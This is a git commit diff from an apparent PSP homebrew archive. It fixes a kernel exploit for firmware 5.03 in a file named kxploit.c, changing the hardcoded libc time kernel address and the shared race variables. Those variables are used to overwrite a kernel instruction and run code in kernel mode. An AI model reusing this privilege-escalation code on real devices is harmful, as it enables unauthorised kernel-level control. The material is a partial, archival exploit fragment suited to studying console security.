kernel exploit working on 5.03

PSP-Archive · Jan 15, 2024 · 5741481 · 5741481
1 parent d91f8bc
commit 5741481
Showing 1 changed file with 5 additions and 4 deletions.
diff --git a/loader/live/kernel/kxploit/sceSdGetLastIndex/kxploit.c b/loader/live/kernel/kxploit/sceSdGetLastIndex/kxploit.c
@@ -37,7 +37,7 @@
 //#define LIBC_TIME_ADDR 0x8800F798
 
 // PSP 5.03
-#define LIBC_TIME_ADDR 0x0000F030
+#define LIBC_TIME_ADDR 0x8800F030
 
 UserFunctions* g_tbl;
 
@@ -49,15 +49,16 @@ void (* _sceKernelCpuResumeIntr)(unsigned int flags) = (void*)NULL;
 
 int savedata_open = 0;
 
-u32 packet[256], is_exploited, libctime_addr=LIBC_TIME_ADDR;
+volatile u32 packet[256];
+volatile int is_exploited;
 
 void executeKernel(u32 kernelContentFunction)
 {
     _sceKernelLibcTime(0x08800000, kernelContentFunction|0x80000000);
 }
 
 void repairInstruction(KernelFunctions* k_tbl){
-    _sw(0x8C654384, libctime_addr); // recover the damage we've done
+    _sw(0x8C654384, LIBC_TIME_ADDR); // recover the damage we've done
 }
 
 void KernelFunction()
@@ -100,7 +101,7 @@ int stubScanner(UserFunctions* tbl){
 int qwik_thread()
 {
     while (is_exploited != 1) {
-        packet[9] = libctime_addr - 18 - (u32)&packet;
+        packet[9] = LIBC_TIME_ADDR - 18 - (u32)packet;
         g_tbl->KernelDelayThread(0);
     }